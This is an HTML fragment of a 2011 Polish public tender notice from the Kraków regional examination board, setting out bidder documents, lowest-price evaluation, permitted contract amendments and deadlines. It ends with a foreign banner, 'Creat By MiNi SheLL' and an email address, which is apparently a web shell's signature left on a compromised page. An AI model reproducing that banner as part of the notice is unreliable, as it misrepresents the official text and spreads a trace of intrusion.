2.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę (w formie oryginału, lub kopii poświadczonej za zgodność z oryginałem) - jeżeli są wymagane dla ważności oferty, zgodnie z aktem rejestracyjnym, wymaganiami ustawowymi oraz przepisami prawa.
3.	Wykonawca wyłoniony w postępowaniu dostarczy Wykaz osób odpowiedzialnych za kierowanie robotami budowlanymi wg załącznika nr 7 do SIWZ, przed  podpisaniem  umowy, wraz z kserokopiami ich uprawnień do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2006, Nr 156, poz. 1118 z późn. zm.) oraz aktualnych zaświadczeń o członkostwie we właściwych izbach samorządu zawodowego.
4.	Harmonogram realizacji robót, z którego wynikać będą terminy odbioru poszczególnych etapów zamówienia - do podpisania umowy wg wzoru z zał. nr 8 do SIWZ.
Uwaga: Oświadczenia wykonawcy określone w punkcie III.4.1. ogłoszenia należy złożyć w zakresie opisanym w SIWZ i załączniku nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5.	Zamawiający zastrzega sobie prawo do wnoszenia zmian treści umowy w zakresie: 
a)	niewielkich zmian edytorskich w treści zawartej umowy w stosunku do jej projektu stanowiącego załącznik nr 3 do SIWZ, 
b)	zmian, co do zakresu i rodzaju robót do wykonania, oraz terminów wykonania zamówienia spowodowanej okolicznościami technicznymi, których nie da się przewidzieć w dniu podpisania umowy, pod warunkiem zaistnienia takiej konieczności,
c)	zmian personelu odpowiedzialnego za kierowanie robotami budowlanymi na inne osoby niż wskazane w załączniku nr 7 do SIWZ, ale posiadające również wymagane uprawnienia,
Warunkiem dokonania zmian postanowień zawartej umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oke.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowa Komisja Egzaminacyjna w Krakowie
	       os. Szkolne 37, 31-978 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2011 godzina 12:00, miejsce: Okręgowa Komisja Egzaminacyjna w Krakowie
	       os. Szkolne 37, 31-978 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com